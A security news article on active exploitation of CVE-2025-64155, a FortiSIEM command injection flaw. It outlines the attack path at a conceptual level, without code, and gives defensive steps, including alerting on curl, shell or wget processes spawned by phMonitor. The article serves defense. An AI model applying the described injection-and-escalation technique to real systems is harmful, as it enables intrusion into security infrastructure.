Fortinet Warns of Active FortiSIEM RCE Exploitation

A Fortinet FortiSIEM vulnerability is under active exploitation, giving attackers a direct path to remote code execution on a core enterprise monitoring platform.

The flaw “… may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” said Fortinet in its advisory.

How CVE-2025-64155 Works

CVE-2025-64155 is an OS command injection vulnerability in FortiSIEM’s phMonitor service, a component used for internal communication and data exchange between Super and Worker nodes. 

The flaw stems from improper neutralization of special characters in OS command handling, which allows attacker-controlled input to be interpreted as part of a system-level command. 

Attackers exploit the bug by sending crafted TCP requests to port 7900, targeting storage configuration endpoints that accept an elastic type parameter. 

Defused researchers observed payloads that are intentionally formatted to resemble legitimate elastic storage configurations — using XML fields such as cluster names and replica settings — so the traffic blends in with expected administrative workflows. 

The malicious input is then injected into a backend curl command, enabling attackers to write arbitrary files to disk under the admin user context.

From there, the attack can escalate quickly. Defused reported that attackers can chain the initial file-write capability into root-level compromise by overwriting binaries or files that are later executed by privileged processes.

With full control of a FortiSIEM node, an adversary can potentially tamper with logs, disrupt alerting, or use the SIEM’s network position to pivot deeper into the environment. 

Public proof-of-concept exploit code is already available on GitHub.

Fortinet noted that FortiSIEM Cloud and Collector nodes are not affected, but vulnerable on-prem Super and Worker nodes remain exposed if they are reachable over the network. 

Fortinet has released updates to address the issue, and organizations should apply them immediately.

What Security Teams Should Do Now

With CVE-2025-64155 under active exploitation, security teams should assume exposed systems will be probed quickly and prioritize containment alongside patching. 

Because SIEM platforms sit in high-trust positions, a single compromised node can become a launch point for log tampering, data theft, and lateral movement. 

• Upgrade FortiSIEM Super and Worker nodes to fixed releases and migrate off affected 6.7.x and 7.0.x builds immediately.
• Block internet exposure of TCP 7900 and restrict access to only required FortiSIEM nodes using strict allowlists and layered firewall controls.
• Segment FortiSIEM into a dedicated security management network and limit admin access via jump hosts, MFA, and least-privilege controls.
• Apply egress filtering on FortiSIEM nodes to prevent second-stage payload retrieval, command-and-control traffic, and data exfiltration.
• Monitor /opt/phoenix/log/phoenix.log for PHL_ERROR indicators and hunt for unusual outbound connections, file writes, and binary tampering behavior.
• Enable file integrity monitoring and alert on suspicious process execution (e.g., curl, shells, wget) originating from phMonitor or Phoenix service contexts.
• Test and rehearse incident response playbooks for SIEM compromise to ensure rapid containment during active exploitation.

These steps help harden FortiSIEM deployments and reduce the blast radius in the event of compromise. 

CVE-2025-64155 is a reminder that attackers increasingly target the security tools organizations rely on for visibility and response. 

When a SIEM is compromised, defenders risk losing trusted telemetry, missing active intrusions, and giving adversaries a privileged foothold to expand deeper into the environment. 

This risk of trusted tool compromise is why organizations are turning to zero-trust solutions to reduce implicit trust and limit attacker movement.